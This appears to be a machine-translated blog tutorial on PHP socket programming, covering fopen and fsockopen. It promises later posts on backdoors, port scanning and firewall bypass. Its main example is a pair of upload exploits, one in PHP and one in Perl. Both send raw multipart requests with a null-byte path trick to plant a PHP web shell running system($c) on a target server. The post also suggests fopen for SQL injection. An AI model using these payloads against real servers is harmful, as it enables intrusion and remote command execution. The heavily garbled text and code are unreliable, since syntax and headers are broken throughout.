The note study PHP2 a month, the harvest is quite many. But unlike others, I prefer socket.php in the socket. So I decided to write a series of Php-socket reading notes. Have been written from the basic to Socket_raw.
Examples + experience. Examples will have port forwarding (break firewall), dynamic network type exp, port scan, PHP back door, Contract type EXP framework. Because of study, can only write one article a week. I hope you will join us in the PHP shell programming.
Objective:
PHP is one of the most popular scripting languages in the world. It has been widely used in web programming for a long time. What I'm trying to say is that PHP is not only good for the web, but also good for the shell. It's just that people are more accustomed to writing shell scripts in Perl. Here is a statement, I am not a php master, contact PHP But a few weeks, this is just a reading note. Please bring up the wrong place. You can also give me mail to discuss PHP together.
Predecessor Knowledge:
PHP is the most attractive place for me is sockets expansion, in fact I will be simple VB WINSOCK, can write a commonly used VB WINSOCK program. But I chose PHP as well. Because it's cross-platform.
PHP default is not to support the advanced socket, only the "encapsulated" fsockopen and so on several functions. Socket as an extension of PHP, you need to set up to make it support. You need to set up PHP in Windows. INI, in PHP. INI find; Windows extensions this line, remove; Extension=php_sockets.dll before the semicolon. That ' S OK. Under *nix, you need to add the-enable-sockets command at compile time. When you do not use the DL () function, your PHP must be in the same directory as the Php_sockets.dll. OK, complete the PHP socket configuration.
Here's the problem with the operation.
Running a PHP script under a terminal is simple. Under Windows C:\php\php.exe–q test.php,*nix the PHP file should be declared in advance by PHP, just as Perl does. Like #!/usr/local/bin/php–q, and then A./test.php. Parameter q means that the PHP header information is not output.
Input parameter problem:
Some people say how the PHP shell enters parameters. In the Web, you can enter parameter http://xxx.com/aa.php 1=xxxx& parameter 2=ssssss. It's okay. php, like Perl, has similar parameter functions. To see the official description.
"ARGV"
The arguments passed to the script. When the script runs on the command-line, the ARGV variable is passed to the program C language-style command-line argument. When you call the Get method, the variable contains the requested data.
"ARGC"
Contains the number of command-line arguments that are passed to the program, if running in command-line mode.
Oh, simple to say. Look, let me give you an example.
?
if ($ARGC!= 4 | | in_array ($ARGC [1], Array ('--help ', '-h ', '? '))
{
echo "by Darkness[bst]. We'll come back soon!\r\n ";
echo "------------------------------------------------\ r \ n";
echo "C:/php/php.exe-q uploadexp.php http://www.bugkidz.org/upload.phpFilepath\r\n ";
echo "------------------------------------------------\ r \ n";
}
$host = $argv [1];
$url = $ARGV [2];
$path = $ARGV [3];
?>
I think you should read it. Oh, here argc[0] refers to the program itself. You can also come here.
Printf (%s, $argv [1]); The previous paragraph talked about the operation of command-line mode. More please refer to
http://www.php.net/manual/zh/features.commandline.php
Application of 1.fopen
Fopen can also be called the encapsulated socket function. Not only for file reading and writing, but also for sockets. Fopen is equivalent to the inet control/class in other advanced languages, and is more advanced for URLs than Fsockopen.
How to use fopen
$s = fopen ($url, mode);
Fopen's Mode property:
Mode description
The ' R ' read-only mode opens, pointing the file pointer to the file header.
' r+ ' read-write mode opens, pointing the file pointer to the file header.
The ' W ' write mode opens, pointing the file pointer to the file header and truncating the file size to zero. If the file does not exist, try creating it.
' w+ ' read-write mode opens, points the file pointer to the file header and truncates the file size to zero. If the file does not exist, try creating it.
The ' a ' write mode opens, pointing the file pointer at the end of the file. If the file does not exist, try creating it.
An ' A + ' read-write mode opens, pointing the file pointer to the end of the file. If the file does not exist, try creating it.
' X ' is created and opened in writing, pointing the file pointer to the file header. If the file already exists, the fopen () call fails and returns FALSE, and a e_warning level error message is generated. If the file does not exist, try creating it. This and specifies the o_excl| for the underlying open (2) system call The o_creat tag is equivalent. This option is supported by PHP 4.3.2 and later versions and can only be used for local files.
' x+ ' is created and opened in read-write mode, pointing the file pointer to the file header. If the file already exists, the fopen () call fails and returns FALSE, and a e_warning level error message is generated. If the file does not exist, try creating it. This and specifies the o_excl| for the underlying open (2) system call The o_creat tag is equivalent. This option is supported by PHP 4.3.2 and later versions and can only be used for local files.
This is the operation for local files, or it can be used for inet. Is it kool?
If you want to test whether a station's IIS directory has write permissions.
Can write like this
$s = fopen ("http://www.bugkidz.org", "x+") or Die ("no write permission exists")
If it exists, you can continue to construct the following statement. Write files remotely with fwrite.
But the average web site is read-only.
$s =fopen ("http://www.bugkidz.org/index.php?id=1", "R");
This reads the content of the http://www.bugkidz.org/index.php?id=1, but it has to be processed to get the full contents of the file.
Such
while (!feof ($s)) {
Echo fgets ($s, 1024);
}
I think fopen is the most convenient for SQL injection.
function Phpinet ($url)
{
fopen ($url, "R") or Die ("Open URL error");
while (!feof ($s)) {
$cahe = fgets ($s, 1024);
}
Retrun $cahe;
Fclose ($s)
}
This function is equivalent to the Inet.openurl in VB
The use of Fsockopen family functions
Fsockopen is also a kind of socket function encapsulated. Somewhat similar to the Winsock control in VB. Unfortunately, it supports active socket connections, does not support Bind,listen, and so on, if you need to implement these features, you will use the advanced socket programming in PHP. Even so, the Fsockopen function can satisfy most of the requirements.
Use fsockopen like this
Resource Fsockopen (string target, int port [, int errno [, String errstr [, float timeout]]]
Example:
$sock = Fsockopen ("192.168.0.1", $errno, $errstr, 30);
The front 2 is the address and the port, the Middle 2 is about the error variable, finally is the timeout setting.
Usually $sock = Fsockopen ("192.168.0.1", 80);
$sock = Fsockopen ("192.168.0.1", 80); This is a typical TCP connection. UDP connections That way.
$sock = Fsockopen ("udp://192.168.0.1", 53);
It is also possible to write a TFTP client with this.
Examples of Fsockopen applications:
Instance one, a simple HTTP session.
Code
<?php $fp = Fsockopen ("www.example.com", $errno, $errstr, 30); if (! $fp) { echo "$errstr ($errno) <br/>\n"; } else { $out = "get/http/1.1\r\n"; $out. = "host:www.example.com\r\n"; $out. = "connection:close\r\n\r\n";
Fwrite ($fp, $out); while (!feof ($fp)) { Echo fgets ($FP, 128); } Fclose ($FP); } ?> |
The process is usually like this
Create Fsockopen resources, define what to send, write the definition content with the Fwrite function or the fputs function, and the output from one line to the end of the file, fgets function or fread use. Use Fclose to close established Fsockopen resources.
Angel wrote a PHP port scanning tool that posted
Http://www.4ngel.net/article/20.htm
Choosing Fsockopen to write a simple exp send frame is definitely a goodidea. Becoz it ' s so easy.
See my PHP upload loophole for exp.
Code
<?php #codz by Darkness Msn:cqxy[at]21cn.net $sock = Fsockopen ("www.ririririri.com", 80); if (! $sock) {echo "Cannot CONNECT it!"; } $body = "-----------------------------7d41f4a600472\r\n". "Content-disposition:form-data; Name=\ "Path\" "\ r \ n". "\ r \ n". "Www.ppp%00\r\n". "-----------------------------7d41f4a600472\r\n". "Content-disposition:form-data; Name=\ "image\"; Filename=\ "f:\\tools\\1.gif\" "\ r \ n". "Content-type:text/plain\r\n". "\ r \ n". "<?php\r\n". "System ($c); \ r \ n". "? >\r\n". "-----------------------------7d41f4a600472--\r\n". "\ r \ n";
$header = "Post/index.php?action=upload http/1.1\r\n". "Accept:image/gif, Image/x-xbitmap, Image/jpeg, Image/pjpeg, Application/msword, Application/x-shockwave-flash, */*\ r\n ". "Referer:http://127.0.0.1/index.php?path=.\r\n". "Accept-language:zh-cn\r\n". "Content-type:multipart/form-data; boundary=---------------------------7d41f4a600472\r\n ". "Accept-encoding:gzip, deflate\r\n". "User-agent:mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Hotbar 4.4.6.0. NET CLR 1.1.4322) \ r \ n ". "Host:127.0.0.1\r\n". "Content-length:strlen ($body) \ r \ n". "Connection:keep-alive\r\n". "Cache-control:no-cache\r\n". "Cookie:phpsessid=111111111111111111111111\r\n". "\ r \ n"; Fputs ($sock, $header); Sleep (1);
Fputs ($sock, $body); while (!feof ($sock)) { Echo fgets ($sock, 128); } Fclose ($sock); ?> |
And look at Xiaolu's exp in Perl.
Code
#!/usr/bin/perl $| = 1; Use Socket; $host = "127.0.0.1"; $port = "80";
$UploadTo = ""; $str = "-----------------------------7d41f4a600472\r\n". "Content-disposition:form-data; Name=\ "Path\" "\ r \ n". "\ r \ n". "Www.ppp%00\r\n". "-----------------------------7d41f4a600472\r\n". "Content-disposition:form-data; Name=\ "image\"; Filename=\ "f:\\tools\\1.gif\" "\ r \ n". "Content-type:text/plain\r\n". "\ r \ n". "<?php\r\n". "System ($c); \ r \ n". "? >\r\n". "-----------------------------7d41f4a600472--\r\n". "\ r \ n";
Print $str; $len =length ($STR); Print $len;
The $req = "post /1/1/3721/index.php?action=upload http/1.1\r\n". Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/msword, application/x-shockwave-flash, */*\r\n ". "referer: http://127.0.0.1/index.php?path=.\r\n". "accept-language: zh-cn\r\n". content-type: multipart/form-data; boundary=---------------------------7d41f4a600472\r\n. "accept-encoding: gzip, deflate\r\n". user-agent: mozilla/4.0 (compatible; msie 6.0; windows nt 5.2; hotbar 4.4.6.0; .net clr 1.1.4322) \ r \ n ". "host: 127.0.0.1\r\n". content-length: $len \ r \ n. "connection: keep-alive\r\n". "cache-control: no-cache\r\n". "cookie: phpsessid=111111111111111111111111\r\n". "\ r \ n". "$str \r\n\r\n"; print $req; @res = sendraw ($req); print @res; #Hmm ... Maybe can send it by the other way
Sub Sendraw { My ($req) = @_; My $target; $target = Inet_aton ($host) | | Die ("Inet_aton problems\n"); Socket (s,pf_inet,sock_stream,getprotobyname (' tcp ') | | 0) | | Die ("Socket problems\n"); if (Connect (s,pack "sna4x8", 2, $port, $target)) { Select (S); $| = 1; Print $req; My @res = <S>; Select (STDOUT); Close (S); return @res;
else { Die ("Can ' t connect...\n");
} |